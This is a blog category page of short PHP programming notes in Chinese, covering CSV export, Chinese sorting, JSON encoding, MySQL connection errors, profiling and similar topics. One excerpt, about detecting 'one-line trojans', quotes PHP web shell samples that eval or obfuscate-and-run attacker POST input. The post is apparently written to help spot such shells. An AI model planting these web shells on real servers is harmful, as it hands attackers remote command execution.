親子日記APP
|
免費申請
|
登入
mini box 迷你盒子
這裡是工程師的筆記資料.
部落格
相簿
APP日記
書籤
目前分類:「
php
」的相關文章
瀏覽方式:
摘要列表
|
標題列表
php 輸出 csv 檔案
2022
12
30
10:30
<?php $filename="filename.csv"; header('Content-Type: application/csv; charset=UTF-8'); header("Content-Disposition: attachment; filename=$filename"); echo "\xEF\xBB\xBF"; echo "id,name...
繼續閱讀»
分類:
php
/
留言(0)
php 中文資料排序
2022
12
25
10:42
中文unicode 並無法依照筆畫正確排序,需轉為 big5 格式才行
網路一堆寫的 mysql 中文排序 並不正確
例如 mysql> SELECT pid,title FROM mydata ORDER BY convert(substr(title,1,4) using big5) ASC; 或 SELECT pid,title FROM mydata ORDER BY convert(title using big5) ...
繼續閱讀»
分類:
php
/
留言(0)
php 字串的編碼/解碼
2022
10
18
10:00
只有範例 Unicode <?php $arr=[ 'title' =>"天氣不錯abc", 'price'=>100 ]; $json = json_encode($arr); echo "$json"; 結果: (Unicode 編碼) {"title":"\u5929\u6c23\u4e0d\u932fabc","price":100} <?php $str = '"\u5929\u6c23\u4e0d\u932f...
繼續閱讀»
分類:
php
/
留言(0)
PHP: gettype()、empty()、is_null()、isset()、bool : if($x) 的區別
2022
03
14
12:19
Comparisons of $x with PHP functions Expression gettype() empty() bool: if($x)
(跟 empty() 相反) is_null() isset()
(跟 is_null 相反) $x = ""; string true false false tr...
繼續閱讀»
分類:
php
/
留言(0)
php連不上mysql: mysqli::__construct(): (HY000/2002): No such file or directory in..
2021
01
17
09:29
<?php $USER ='root'; $PW ='pwpwpw'; $HOST ='localhost'; $mysqli = new mysqli($HOST, $USER, $PW, 'test'); if ($mysqli->connect_error) { echo $mysqli->connect_errno; echo "\n"; echo $mysqli->connect_error; echo "\n"; } else { echo "ok"; } ...
繼續閱讀»
分類:
php
/
留言(1)
PHP 效能檢測工具:XHProf
2020
09
30
17:39
XHProf 是 facebook 開發的 PHP 效能追蹤軟體 profiler 可顯示程式執行時,各 function 花費的時間、記憶體、CPU 消耗裝況..可用來找出瓶頸、評估軟體改善 XHProf is a function-level hierarchical profiler for PHP and has a simple HTML based navigational interface. The raw data collection component is implemented in C (as a PHP extension). The reporting/UI layer is all in PHP. It is capable of repor...
繼續閱讀»
分類:
php
/
留言(0)
php imagepng 錯誤
2020
05
30
15:04
執行imagepng($image_p, $dest_filename) 時出現錯誤: imagepng(): gd-png error: cannot allocate libpng main struct ....
解決:
yum remove libpng*
yum install libpng*
重新 make mod_php
...
繼續閱讀»
分類:
php
/
留言(0)
[php] self、$this 區別
2019
06
24
12:00
Use $this to refer to the current object. Use self to refer to the current class.
In other words,
use $this->member for non-static members,
use self::$member for static members...
繼續閱讀»
分類:
php
/
留言(0)
一句話木馬 簡單偵測
2018
12
06
11:52
各種 PHP【一句話木馬】
<?php eval($_POST[g]);?> <?php $aa = str_replace(x,"","axsxxsxexrxxt"); $aa($_POST["test"]); ?> 例如: <?php function fo(){ //do someth...
繼續閱讀»
分類:
php
/
留言(0)
note: PHP 程式碼分析工具
2018
01
24
10:57
static analysis tool for PHP
Code Sniffer
https://github.com/squizlabs/PHP_CodeSniffer
PHP_CodeSniffer is a set of two PHP scripts; the main phpcs script that tokenizes PHP, JavaScript and CSS files to dete...
繼續閱讀»
分類:
php
/
留言(0)
上一頁
1
2
下一頁